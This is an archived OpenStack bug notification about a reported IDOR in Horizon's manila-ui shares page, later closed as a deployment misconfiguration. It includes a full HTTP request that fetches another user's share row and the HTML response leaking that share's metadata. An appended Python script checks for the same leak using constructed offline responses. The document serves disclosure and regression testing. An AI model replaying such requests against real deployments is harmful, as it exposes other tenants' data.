
yahoo-eng-team team mailing list archive

[Bug 1861895] Re: IDOR in /dashboard/project/shares/


Given that it has been over a year and a half since the reporter acknowledged
they were fixing the configuration error in their environment, and they
haven't responded further to a request for an update in that time, I'm
switching the report to public now.

** Information type changed from Private Security to Public

** Changed in: manila
       Status: New => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1861895

Title:
  IDOR in /dashboard/project/shares/

Status in OpenStack Dashboard (Horizon):
  Invalid
Status in OpenStack Shared File Systems Service (Manila):
  Invalid
Status in manila-ui:
  Invalid
Status in OpenStack Security Advisory:
  Invalid

Bug description:
  Hello, I believe I found an IDOR exposing some information about other users'
  shares. Not sure if it's a Manila vulnerability; I couldn't map this
  Horizon endpoint to the one on the Manila API. Hope you can clarify things
  for me.

  Info:
  When sending a request to /dashboard/project/shares/?action=row_update&table=shares&obj_id=<share_id> , an attacker can send another user's share ID and disclose information in the response, such as Name, Description, Size, Status, Visibility, Protocol, Share Network.

  Request example, where 33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a is the id of
  a share which does not belong to me:

  GET /dashboard/project/shares/?action=row_update&table=shares&obj_id=33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a HTTP/1.1
  Host: <redacted>
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  X-Requested-With: XMLHttpRequest
  Connection: close
  Referer: https://<redacted>/dashboard/project/shares/
  Cookie: <redacted>

  Response example:

  HTTP/1.1 200 OK
  ...
  Content-Length: 3027

  <tr class="ajax-update status_up" data-display="File_storage_3498" data-display-key="name" data-object-id="33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a" data-update-interval="2500" data-update-url="/dashboard/project/shares/?action=row_update&amp;table=shares&amp;obj_id=33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a" id="shares__row__33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a">
      <td class="multi_select_column"><div class="themable-checkbox"><input class="table-row-multi-select" id="e7b9b987-e705-43aa-a605-f8d585e06768" name="object_ids" type="checkbox" value="33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a" /><label for="e7b9b987-e705-43aa-a605-f8d585e06768"></label></div></td><td class="word-break sortable anchor normal_column"><a href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/" >File_storage_3498</a></td><td class="sortable normal_column">
              1231
          </td><td class="sortable normal_column"></td><td class="sortable normal_column">
              10GiB
          </td><td class="status_up sortable normal_column">
              Available
          </td><td class="sortable normal_column">
              private
          </td><td class="sortable normal_column">
              NFS
          </td><td class="sortable normal_column">
              File_storage_3498_network
          </td><td class="actions_column"><div class="btn-group"><a id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_edit" class="btn data-table-action btn-default btn-sm ajax-modal btn-create" href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/update/"> Edit Share</a><a class="btn btn-default btn-sm dropdown-toggle" data-toggle="dropdown" href="#"><span class="fa fa-caret-down"></span></a><ul class="dropdown-menu dropdown-menu-right row_actions"><li><a id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_extend_share" class="btn data-table-action ajax-modal btn-create" href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/extend/"> Extend Share</a></li><li><a id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_snapshots" class="btn data-table-action ajax-modal btn-camera" href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/create_snapshot/"> Create Snapshot</a></li><li><a id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_manage_rules" class="btn data-table-action btn-edit" href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/rules/"> Manage Rules</a></li><li><a id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_update_metadata" class="btn data-table-action ajax-modal btn-create" href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/update_metadata/"> Edit Share Metadata</a></li><li><button data-batch-action="true" id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_delete" class="data-table-action btn-danger btn" name="action" help_text="This action cannot be undone." type="submit" value="shares__delete__33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"> Delete Share</button></li></ul></div></td>
  </tr>
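The report above was closed as a configuration error in the reporter's deployment. As an added example (not part of the bug report, Horizon or manila-ui), here is a regression check a deployer can run after tightening policy: with project A's session it requests the shares table row for a share id that belongs to project B and reports whether any share data came back. The HTTP transport is injected so the check runs offline against the constructed responses below; base URL, share ids and cookie values are placeholders.

```python
import re
from urllib.parse import urlencode

ROW_UPDATE_PATH = "/dashboard/project/shares/"


def row_update_url(base_url, share_id):
    # Same query string the report shows: action=row_update&table=shares&obj_id=<id>
    query = urlencode({"action": "row_update", "table": "shares", "obj_id": share_id})
    return f"{base_url.rstrip('/')}{ROW_UPDATE_PATH}?{query}"


def row_discloses_share(status, body, share_id):
    """True if the response carries a populated ajax table row for share_id.

    Horizon's row markup (see the report) puts the object id in data-object-id
    and the share name in data-display; a non-200 status, an empty body or a
    row without both attributes counts as 'nothing disclosed'."""
    if status != 200:
        return False
    match = re.search(r'data-object-id="([^"]+)"', body)
    return bool(match) and match.group(1) == share_id and 'data-display="' in body


def check_cross_project_isolation(send, base_url, foreign_share_id):
    """send(url, headers) -> (status, body), authenticated as project A.

    Returns (ok, detail); ok is True when project B's share is NOT disclosed."""
    headers = {"X-Requested-With": "XMLHttpRequest", "Accept": "*/*"}
    status, body = send(row_update_url(base_url, foreign_share_id), headers)
    leaked = row_discloses_share(status, body, foreign_share_id)
    return (not leaked, f"HTTP {status}, row returned={leaked}")


# Constructed transports standing in for a hardened and a misconfigured deployment.
def hardened_send(url, headers):
    return 404, ""


def leaky_send(url, headers):
    sid = url.split("obj_id=")[1]
    return 200, (f'<tr class="ajax-update status_up" data-display="File_storage_3498" '
                 f'data-object-id="{sid}"><td>10GiB</td></tr>')


if __name__ == "__main__":
    fid = "33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"  # foreign share id quoted in the report
    print(check_cross_project_isolation(hardened_send, "https://horizon.example", fid))
    print(check_cross_project_isolation(leaky_send, "https://horizon.example", fid))
```

On a live deployment, `send` would wrap a `requests.Session` carrying project A's Horizon session cookie; a `False` result means cross-project share metadata is still reachable through this endpoint.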
